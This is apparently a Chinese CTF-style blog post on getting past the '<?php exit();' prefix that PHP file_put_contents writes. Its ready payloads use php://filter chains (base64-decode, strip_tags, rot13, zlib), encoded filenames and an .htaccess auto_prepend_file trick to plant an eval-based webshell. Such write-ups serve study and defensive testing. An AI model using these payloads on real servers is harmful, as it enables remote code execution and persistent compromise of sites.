

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=light>


<!-- Google tag (gtag.js) -->
<script async src="https://www.googletagmanager.com/gtag/js?id=G-G582PR7P29"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());
  gtag('config', 'G-G582PR7P29');
</script>
<head>
  <meta charset="UTF-8">

  <link rel="apple-touch-icon" sizes="76x76" href="/img/fluid.png">
  <link rel="icon" href="/img/fluid.png">
  

  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="kivvs">
  <meta name="keywords" content="">
  
    <meta name="description" content="经常出现的三种情形 123file_put_contents($filename,&quot;&lt;?php exit();&quot;.$content);file_put_contents($content,&quot;&lt;?php exit();&quot;.$content);file_put_contents($filename,$content . &quot;\nxxxxxx&amp;">
<meta property="og:type" content="article">
<meta property="og:title" content="file_put_content死亡杂糅">
<meta property="og:url" content="https://kivvs.github.io/2026/08/14/file_put_content%E6%AD%BB%E4%BA%A1%E6%9D%82%E7%B3%85/index.html">
<meta property="og:site_name" content="kivvs">
<meta property="og:description" content="经常出现的三种情形 123file_put_contents($filename,&quot;&lt;?php exit();&quot;.$content);file_put_contents($content,&quot;&lt;?php exit();&quot;.$content);file_put_contents($filename,$content . &quot;\nxxxxxx&amp;">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://kivvs.github.io/images/3795925-20260505232316870-1145760888.png">
<meta property="og:image" content="https://kivvs.github.io/images/3795925-20260505232446777-1997517219.png">
<meta property="article:published_time" content="2026-08-14T06:12:58.000Z">
<meta property="article:modified_time" content="2026-08-14T09:59:16.234Z">
<meta property="article:author" content="kivvs">
<meta property="article:tag" content="web">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="https://kivvs.github.io/images/3795925-20260505232316870-1145760888.png">
  
  
  
  <title>file_put_content死亡杂糅 - kivvs</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1749284_5i9bdhy70f8.css">



<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1736178_k526ubmyhba.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"kivvs.github.io","root":"/","version":"1.9.9","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"expand_all":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":true,"follow_dnt":true,"baidu":null,"google":{"gtag":"G-G582PR7P29"},"tencent":{"sid":null,"cid":null},"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false},"openkounter":{"server_url":"https://open-kounter.mintimate.cn","path":"window.location.pathname","ignore_local":false},"umami":{"src":null,"website_id":null,"domains":null,"start_time":"2024-01-01T00:00:00.000Z","token":null,"api_server":null}},"search_path":"/local-search.xml","include_content_in_search":true};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  

  

  

  

  

  

  
    
  




  
<meta name="generator" content="Hexo 8.1.2"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>kivvs</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content (desktop) -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/" target="_self">
                <i class="iconfont icon-home-fill"></i>
                <span>首页</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/" target="_self">
                <i class="iconfont icon-archive-fill"></i>
                <span>归档</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/" target="_self">
                <i class="iconfont icon-category-fill"></i>
                <span>分类</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/" target="_self">
                <i class="iconfont icon-tags-fill"></i>
                <span>标签</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/" target="_self">
                <i class="iconfont icon-user-fill"></i>
                <span>关于</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

<!-- Mobile grid menu overlay -->
<div id="mobile-grid-menu" class="d-lg-none">
  <div class="mobile-grid-menu-inner">
    <div class="container">
      <div class="row">
        
          
          
          
          
            <div class="col-4 mobile-grid-cell">
              <a href="/" target="_self">
                <div class="mobile-grid-item">
                  <i class="iconfont icon-home-fill"></i>
                  <span>首页</span>
                </div>
              </a>
            </div>
          
        
          
          
          
          
            <div class="col-4 mobile-grid-cell">
              <a href="/archives/" target="_self">
                <div class="mobile-grid-item">
                  <i class="iconfont icon-archive-fill"></i>
                  <span>归档</span>
                </div>
              </a>
            </div>
          
        
          
          
          
          
            <div class="col-4 mobile-grid-cell">
              <a href="/categories/" target="_self">
                <div class="mobile-grid-item">
                  <i class="iconfont icon-category-fill"></i>
                  <span>分类</span>
                </div>
              </a>
            </div>
          
        
          
          
          
          
            <div class="col-4 mobile-grid-cell">
              <a href="/tags/" target="_self">
                <div class="mobile-grid-item">
                  <i class="iconfont icon-tags-fill"></i>
                  <span>标签</span>
                </div>
              </a>
            </div>
          
        
          
          
          
          
            <div class="col-4 mobile-grid-cell">
              <a href="/about/" target="_self">
                <div class="mobile-grid-item">
                  <i class="iconfont icon-user-fill"></i>
                  <span>关于</span>
                </div>
              </a>
            </div>
          
        
        
          <div class="col-4 mobile-grid-cell" id="mobile-search-btn">
            <a href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <div class="mobile-grid-item">
                <i class="iconfont icon-search"></i>
                <span>搜索</span>
              </div>
            </a>
          </div>
        
        
          <div class="col-4 mobile-grid-cell" id="mobile-color-toggle-btn"
               data-label-light="开灯"
               data-label-dark="关灯">
            <a href="javascript:;" aria-label="Color Toggle">
              <div class="mobile-grid-item">
                <i class="iconfont icon-dark" id="mobile-color-toggle-icon"></i>
                <span id="mobile-color-toggle-label">关灯</span>
              </div>
            </a>
          </div>
        
      </div>
    </div>
  </div>
</div>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/default.png') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="file_put_content死亡杂糅"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2026-08-14 14:12" pubdate>
          2026年8月14日 下午
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          7.8k 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          66 分钟
        
      </span>
    

    
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>



</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <h1 id="seo-header">file_put_content死亡杂糅</h1>
            
            
              <div class="markdown-body">
                
                <p>经常出现的三种情形</p>
<figure class="highlight swift"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs swift">file_put_contents(<span class="hljs-variable">$filename</span>,<span class="hljs-string">&quot;&lt;?php exit();&quot;</span>.<span class="hljs-variable">$content</span>);<br>file_put_contents(<span class="hljs-variable">$content</span>,<span class="hljs-string">&quot;&lt;?php exit();&quot;</span>.<span class="hljs-variable">$content</span>);<br>file_put_contents(<span class="hljs-variable">$filename</span>,<span class="hljs-variable">$content</span> . <span class="hljs-string">&quot;<span class="hljs-subst">\n</span>xxxxxx&quot;</span>);<br></code></pre></td></tr></table></figure>

<h2 id="Bypass-相同变量"><a href="#Bypass-相同变量" class="headerlink" title="Bypass-相同变量"></a>Bypass-相同变量</h2><p>接下来就这个例题我们来做一个简单的研究</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br><span class="hljs-variable">$content</span> = <span class="hljs-string">&#x27;&lt;?php exit; ?&gt;&#x27;</span>;<br><span class="hljs-variable">$content</span> .= <span class="hljs-variable">$_POST</span>[<span class="hljs-string">&#x27;txt&#x27;</span>];<br><span class="hljs-title function_ invoke__">file_put_contents</span>(<span class="hljs-variable">$_POST</span>[<span class="hljs-string">&#x27;filename&#x27;</span>], <span class="hljs-variable">$content</span>);<br></code></pre></td></tr></table></figure>

<p>这道题是最简单的一道死亡绕过，是利用file_put_contents函数写入一道&lt;?php exit();，</p>
<h3 id="巧用编码与解码"><a href="#巧用编码与解码" class="headerlink" title="巧用编码与解码"></a>巧用编码与解码</h3><p>$content在开头增加了exit过程，导致即使我们成功写入一句话，也执行不了（这个过程在实战中十分常见，通常出现在缓存、配置文件等等地方，不允许用户直接访问的文件，都会被加上if(!defined(xxx))exit; 之类的限制）。</p>
<p>那么这种情况下，如何绕过这个“死亡exit”？<br>	幸运的是，这里的$_POST[‘filename’]是可以控制协议的，我们即可使用 php:&#x2F;&#x2F;filter协议来施展魔法：使用php:&#x2F;&#x2F;filter流的base64-decode方法，将$content解码，利用php base64_decode函数特性去除“死亡exit”。</p>
<p>总而言之，这就是利用base64编码解码的原理，利用多输出的一个字母’a’将phpexit七个字符被识别为 “phpexita”从而被正常解码 。 而后面我们传入的webshell的base64内容也被正常解码。结果就是没有了。<br>	这里我们就有payload<br>	以下面payload原型为例</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs php">filename=php:<span class="hljs-comment">//filter/write=convert.base64-decode/resource=1.php</span><br>txt=<span class="hljs-meta">&lt;?php</span> @<span class="hljs-keyword">eval</span>(<span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;cmd&#x27;</span>]);<span class="hljs-meta">?&gt;</span><br></code></pre></td></tr></table></figure>

<p>变为</p>
<figure class="highlight perl"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs perl">filename=<span class="hljs-variable">%2</span>5<span class="hljs-variable">%3</span>7<span class="hljs-variable">%3</span>0<span class="hljs-variable">%2</span>5<span class="hljs-variable">%3</span>6<span class="hljs-variable">%3</span>8<span class="hljs-variable">%2</span>5<span class="hljs-variable">%3</span>7<span class="hljs-variable">%3</span>0<span class="hljs-variable">%2</span>5<span class="hljs-variable">%3</span>3<span class="hljs-variable">%6</span>1<span class="hljs-variable">%2</span>5<span class="hljs-variable">%3</span>2<span class="hljs-variable">%6</span>6<span class="hljs-variable">%2</span>5<span class="hljs-variable">%3</span>2<span class="hljs-variable">%6</span>6<span class="hljs-variable">%2</span>5<span class="hljs-variable">%3</span>6<span class="hljs-variable">%3</span>6<span class="hljs-variable">%2</span>5<span class="hljs-variable">%3</span>6<span class="hljs-variable">%3</span>9<span class="hljs-variable">%2</span>5<span class="hljs-variable">%3</span>6<span class="hljs-variable">%6</span>3<span class="hljs-variable">%2</span>5<span class="hljs-variable">%3</span>7<span class="hljs-variable">%3</span>4<span class="hljs-variable">%2</span>5<span class="hljs-variable">%3</span>6<span class="hljs-variable">%3</span>5<span class="hljs-variable">%2</span>5<span class="hljs-variable">%3</span>7<span class="hljs-variable">%3</span>2<span class="hljs-variable">%2</span>5<span class="hljs-variable">%3</span>2<span class="hljs-variable">%6</span>6<span class="hljs-variable">%2</span>5<span class="hljs-variable">%3</span>7<span class="hljs-variable">%3</span>7<span class="hljs-variable">%2</span>5<span class="hljs-variable">%3</span>7<span class="hljs-variable">%3</span>2<span class="hljs-variable">%2</span>5<span class="hljs-variable">%3</span>6<span class="hljs-variable">%3</span>9<span class="hljs-variable">%2</span>5<span class="hljs-variable">%3</span>7<span class="hljs-variable">%3</span>4<span class="hljs-variable">%2</span>5<span class="hljs-variable">%3</span>6<span class="hljs-variable">%3</span>5<span class="hljs-variable">%2</span>5<span class="hljs-variable">%3</span>3<span class="hljs-variable">%6</span>4<span class="hljs-variable">%2</span>5<span class="hljs-variable">%3</span>6<span class="hljs-variable">%3</span>3<span class="hljs-variable">%2</span>5<span class="hljs-variable">%3</span>6<span class="hljs-variable">%6</span>6<span class="hljs-variable">%2</span>5<span class="hljs-variable">%3</span>6<span class="hljs-variable">%6</span>5<span class="hljs-variable">%2</span>5<span class="hljs-variable">%3</span>7<span class="hljs-variable">%3</span>6<span class="hljs-variable">%2</span>5<span class="hljs-variable">%3</span>6<span class="hljs-variable">%3</span>5<span class="hljs-variable">%2</span>5<span class="hljs-variable">%3</span>7<span class="hljs-variable">%3</span>2<span class="hljs-variable">%2</span>5<span class="hljs-variable">%3</span>7<span class="hljs-variable">%3</span>4<span class="hljs-variable">%2</span>5<span class="hljs-variable">%3</span>2<span class="hljs-variable">%6</span>5<span class="hljs-variable">%2</span>5<span class="hljs-variable">%3</span>6<span class="hljs-variable">%3</span>2<span class="hljs-variable">%2</span>5<span class="hljs-variable">%3</span>6<span class="hljs-variable">%3</span>1<span class="hljs-variable">%2</span>5<span class="hljs-variable">%3</span>7<span class="hljs-variable">%3</span>3<span class="hljs-variable">%2</span>5<span class="hljs-variable">%3</span>6<span class="hljs-variable">%3</span>5<span class="hljs-variable">%2</span>5<span class="hljs-variable">%3</span>3<span class="hljs-variable">%3</span>6<span class="hljs-variable">%2</span>5<span class="hljs-variable">%3</span>3<span class="hljs-variable">%3</span>4<span class="hljs-variable">%2</span>5<span class="hljs-variable">%3</span>2<span class="hljs-variable">%6</span>4<span class="hljs-variable">%2</span>5<span class="hljs-variable">%3</span>6<span class="hljs-variable">%3</span>4<span class="hljs-variable">%2</span>5<span class="hljs-variable">%3</span>6<span class="hljs-variable">%3</span>5<span class="hljs-variable">%2</span>5<span class="hljs-variable">%3</span>6<span class="hljs-variable">%3</span>3<span class="hljs-variable">%2</span>5<span class="hljs-variable">%3</span>6<span class="hljs-variable">%6</span>6<span class="hljs-variable">%2</span>5<span class="hljs-variable">%3</span>6<span class="hljs-variable">%3</span>4<span class="hljs-variable">%2</span>5<span class="hljs-variable">%3</span>6<span class="hljs-variable">%3</span>5<span class="hljs-variable">%2</span>5<span class="hljs-variable">%3</span>2<span class="hljs-variable">%6</span>6<span class="hljs-variable">%2</span>5<span class="hljs-variable">%3</span>7<span class="hljs-variable">%3</span>2<span class="hljs-variable">%2</span>5<span class="hljs-variable">%3</span>6<span class="hljs-variable">%3</span>5<span class="hljs-variable">%2</span>5<span class="hljs-variable">%3</span>7<span class="hljs-variable">%3</span>3<span class="hljs-variable">%2</span>5<span class="hljs-variable">%3</span>6<span class="hljs-variable">%6</span>6<span class="hljs-variable">%2</span>5<span class="hljs-variable">%3</span>7<span class="hljs-variable">%3</span>5<span class="hljs-variable">%2</span>5<span class="hljs-variable">%3</span>7<span class="hljs-variable">%3</span>2<span class="hljs-variable">%2</span>5<span class="hljs-variable">%3</span>6<span class="hljs-variable">%3</span>3<span class="hljs-variable">%2</span>5<span class="hljs-variable">%3</span>6<span class="hljs-variable">%3</span>5<span class="hljs-variable">%2</span>5<span class="hljs-variable">%3</span>3<span class="hljs-variable">%6</span>4<span class="hljs-variable">%2</span>5<span class="hljs-variable">%3</span>3<span class="hljs-variable">%3</span>1<span class="hljs-variable">%2</span>5<span class="hljs-variable">%3</span>2<span class="hljs-variable">%6</span>5<span class="hljs-variable">%2</span>5<span class="hljs-variable">%3</span>7<span class="hljs-variable">%3</span>0<span class="hljs-variable">%2</span>5<span class="hljs-variable">%3</span>6<span class="hljs-variable">%3</span>8<span class="hljs-variable">%2</span>5<span class="hljs-variable">%3</span>7<span class="hljs-variable">%30</span>  <br>txt=aPD9waHAgQGV2YWwoJF9HRVRbJ2NtZCddKTs/Pg==<br></code></pre></td></tr></table></figure>

<p>上面filename的值需要经过URL双重编码得到下面payload，同时txt的值需要将一句话木马base64编码后加上一个字母’a’，但如果题目是phpdie,则需要在前面加两个’a’来满足八个字符的效果</p>
<h3 id="利用字符串操作方法"><a href="#利用字符串操作方法" class="headerlink" title="利用字符串操作方法"></a>利用字符串操作方法</h3><h4 id="strip-tags函数"><a href="#strip-tags函数" class="headerlink" title="strip_tags函数"></a>strip_tags函数</h4><p>我们观察一下，这个实际上是什么？<br>	实际上是一个XML标签，既然是XML标签，我们就可以利用strip_tags函数去除它，而php:&#x2F;&#x2F;filter刚好是支持这个方法的。<br>	所以，我们可以利用 php:&#x2F;&#x2F;filter允许使用多个过滤器的特点，先将webshell用base64编码。在调用完成strip_tags后再进行base64-decode。“死亡exit”在第一步被去除， 而webshell在第二步被还原。<br>	那么给到以下payload：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs php">txt=PD9waHAgQGV2YWwoJF9HRVRbJ2NtZCddKTs/Pg==<br>(<span class="hljs-meta">&lt;?php</span> @<span class="hljs-keyword">eval</span>(<span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;cmd&#x27;</span>]);<span class="hljs-meta">?&gt;</span>)<br>&amp;<br>filename=php:<span class="hljs-comment">//filter/write=string.strip_tags|convert.base64-decode/resource=shell.php</span><br></code></pre></td></tr></table></figure>

<h4 id="string-rot13"><a href="#string-rot13" class="headerlink" title="string.rot13"></a>string.rot13</h4><p><strong>利用前提：</strong> PHP不开启short_open_tag（短标签）<br>	在字符串过滤器中除了使用string.strip_tagsBypass外,还可以使用string.rot13进行Bypass利用<br>str_rot13() 函数对字符串执行 ROT13 编码。</p>
<p>ROT13 编码是把每一个字母在字母表中向前移动 13 个字母得到。数字和非字母字符保持不变。<br>编码和解码都是由相同的函数完成的。如果您把一个已编码的字符串作为参数，那么将返回原始字符串。<br>原理与前面差不多，直接给到payload</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs php">txt=<span class="hljs-meta">&lt;?</span>cuc @<span class="hljs-title function_ invoke__">riny</span>(<span class="hljs-variable">$_CBFG</span>[pzq])<span class="hljs-meta">?&gt;</span><br>（<span class="hljs-meta">&lt;?php</span> @<span class="hljs-keyword">eval</span>(<span class="hljs-variable">$_POST</span>[cmd])<span class="hljs-meta">?&gt;</span>）<br>filename=php:<span class="hljs-comment">//filter/write=string.rot13/resource=shell.php</span><br></code></pre></td></tr></table></figure>

<h3 id="htaccess的预包含利用"><a href="#htaccess的预包含利用" class="headerlink" title=".htaccess的预包含利用"></a>.htaccess的预包含利用</h3><p><strong>局限性</strong>:需要知道flag文件的位置，和文件的名字，string.strip_tags过滤器只是可以在php5的环境下顺利的使用，如果题目环境是在php7.3.0以上的环境下，则会发生段错误</p>
<ol>
<li><strong>第一步</strong>：绕过 die() —— 用 strip_tags 过滤器<br>file_put_contents 实际写入的原始字符串是：<br><code>&lt;?php exit(); + $content内容</code></li>
</ol>
<p>当 filename 用了 php:&#x2F;&#x2F;filter&#x2F;write&#x3D;string.strip_tags&#x2F;resource&#x3D;.htaccess 时，string.strip_tags 会在写入磁盘前，把整个字符串里所有 HTML&#x2F;XML 标签都删掉。<br>PHP 标签 在 strip_tags 眼里就是一个”标签”，所以变成 php exit();</p>
<ol start="2">
<li><strong>第二步</strong>：写入 .htaccess 指令<br><code>$content=?&gt;php_value auto_prepend_file \1.php</code></li>
</ol>
<p>开头的 ?&gt; 是为了闭合 die 前面可能残留的 &lt;?php（完整的XML标签），strip_tags 处理后，最终写入 .htaccess 的内容是：<br><code>php_value auto_prepend_file \1.php</code><br>	这是一条合法的 .htaccess 指令，意思是：每次执行任何 PHP 文件之前，自动先加载 \1.php。<br>所以只要 1.php 存在 webshell，访问网站任意 PHP 页面都会触发它。</p>
<figure class="highlight perl"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs perl"><span class="hljs-variable">$filename</span>=php:<span class="hljs-regexp">//</span>filter/<span class="hljs-keyword">write</span>=string.strip_tags/resource=.htaccess<br><span class="hljs-variable">$content</span>=?&gt;php_value<span class="hljs-variable">%20auto_prepend</span>_file<span class="hljs-variable">%20</span>\<span class="hljs-number">1</span>.php<br></code></pre></td></tr></table></figure>

<h3 id="最终过滤选择器组合拳"><a href="#最终过滤选择器组合拳" class="headerlink" title="最终过滤选择器组合拳"></a>最终过滤选择器组合拳</h3><p>如果题目的环境是php7的话，那么我们又该如何？这里受一个题目的启发，也可以使用过滤器进行嵌套来做；组合拳；这里三个过滤器叠加之后先进行压缩，然后转小写，最后解压，会导致部分死亡代码错误；则可以写入shell；</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs plain">$filename=php://filter/zlib.deflate|string.tolower|zlib.inflate|/resource=shell.php<br>$content=php://filter/zlib.deflate|string.tolower|zlib.inflate|?&gt;&lt;?php%0d@eval($_POST[cmd]);?&gt;/resource=shell.php<br></code></pre></td></tr></table></figure>

<p><img src="https://kivvs.github.io/images/3795925-20260505232316870-1145760888.png" srcset="/img/loading.gif" lazyload></p>
<p>注：这里有过尝试但是无法正常上传一句话木马，还有待改进，此方法暂时行不通。同时要用BP上传，否则上传文件名是部分URL编码，用BP上传后能够正常上传文件且文件名正常，但是内容总是乱码，具体原因不得而知。</p>
<h2 id="Bypass-不同变量"><a href="#Bypass-不同变量" class="headerlink" title="Bypass-不同变量"></a>Bypass-不同变量</h2><p>前面一直都是在相同变量的情况下进行绕过，现在我们再来讨论一下不同变量的是如何绕过的，实际上与前面的原理差不太多</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br><span class="hljs-variable">$a</span> = <span class="hljs-variable">$_GET</span>[a];<br><span class="hljs-title function_ invoke__">file_put_contents</span>(<span class="hljs-variable">$a</span>,<span class="hljs-string">&#x27;&lt;?php exit();&#x27;</span>.<span class="hljs-variable">$a</span>)<br><span class="hljs-meta">?&gt;</span><br></code></pre></td></tr></table></figure>

<p>分析代码可以看到，这种情况下写入的文件，其文件名和文件部分内容一致，这就导致利用的难度大大增加了，不过最终目的还是相同的：去除死亡exit写入shell后门。<br>	在上面不同变量利用base64构造payload的基础上，可以针对相同变量再次构造相应payload，在文件名中包含，满足正常解码就可以。</p>
<h3 id="convert-base64"><a href="#convert-base64" class="headerlink" title="convert.base64"></a>convert.base64</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs plain">a=php://filter/write=convert.base64-decode/resource=PD9waHAgQGV2YWwoJF9QT1NUW1FmdG1dKT8+.php<br><br>//注意payload中的字符&#x27;+&#x27;在浏览器中需要转换为%2B<br><br># &lt;?php @eval($_POST[Qftm])?&gt;<br></code></pre></td></tr></table></figure>

<p>其实这样构造是不可以的，因为构造的payload里面包含’&#x3D;’符号，而base64解码的时候如果字符’&#x3D;’后面包含有其他字符则会报错。<br>	从下图我们也可以看出来</p>
<p><img src="https://kivvs.github.io/images/3795925-20260505232446777-1997517219.png" srcset="/img/loading.gif" lazyload></p>
<p>那么能不能尝试把字符等号去掉，分析payload可以把字符串write&#x3D;去掉减少一个等号，但是字符串resource&#x3D;里面的等号不能去掉，也就导致该payload构造失败。 这里到后面 讲述convert.iconv.*的utf8-utf7的时候会讲述怎么绕过base64解码时字符’&#x3D;’的限制<br>	不过这里还有一种去掉等号之直接对内容进行变性另类base64的方法</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs php">php:<span class="hljs-comment">//filter/&lt;?|string.strip_tags|convert.base64-decode/resource=?&gt;PD9waHAgQGV2YWwoJF9QT1NUW1FmdG1dKT8+/../shell.php</span><br>(<span class="hljs-meta">&lt;?php</span> @<span class="hljs-keyword">eval</span>(<span class="hljs-variable">$_POST</span>[Qftm])<span class="hljs-meta">?&gt;</span>)<br> <span class="hljs-keyword">string</span>.strip_tags  <br>a=php:<span class="hljs-comment">//filter/write=string.strip_tags|convert.base64-decode/resource=?&gt;PD9waHAgQGV2YWwoJF9QT1NUW1FmdG1dKT8+.php</span><br>(<span class="hljs-meta">&lt;?php</span> @<span class="hljs-keyword">eval</span>(<span class="hljs-variable">$_POST</span>[Qftm])<span class="hljs-meta">?&gt;</span>)<br><br><span class="hljs-comment"># 结果</span><br><span class="hljs-meta">&lt;?php</span>  <span class="hljs-keyword">exit</span>();php:<span class="hljs-comment">//filter/write=string.strip_tags|convert.base64-decode/resource=?&gt;PD9waHAgQGV2YWwoJF9QT1NUW1FmdG1dKT8+.php</span><br></code></pre></td></tr></table></figure>

<p>这样其实可以利用成功，但是会发现这样的文件访问会有问题,不过利用..&#x2F;重命名即可解决。<br><code>a=php://filter/write=string.strip_tags|convert.base64-decode/resource=?&gt;PD9waHAgQGV2YWwoJF9QT1NUW1FmdG1dKT8+/../shell.php</code><br>	把?&gt;PD9waHAgQGV2YWwoJF9QT1NUW1FmdG1dKT8+作为目录名（不管存不存在），再用..&#x2F;回退一下，这样创建出来的文件名为shell.php，这样创建出来的文件名就正常了<br>	不过这种方法有一个缺点就是这种利用手法在windows下利用不成功，因为文件名里面的? &gt;等这些是特殊字符会导致文件的创建失败。</p>
<h3 id="string-rot13-1"><a href="#string-rot13-1" class="headerlink" title="string.rot13"></a>string.rot13</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs plain">a=php://filter/write=string.rot13/resource=&lt;?cuc @riny($_CBFG[pzq])?&gt;/../shell.php<br>(&lt;?php @eval($_POST[cmd])?&gt;)<br></code></pre></td></tr></table></figure>

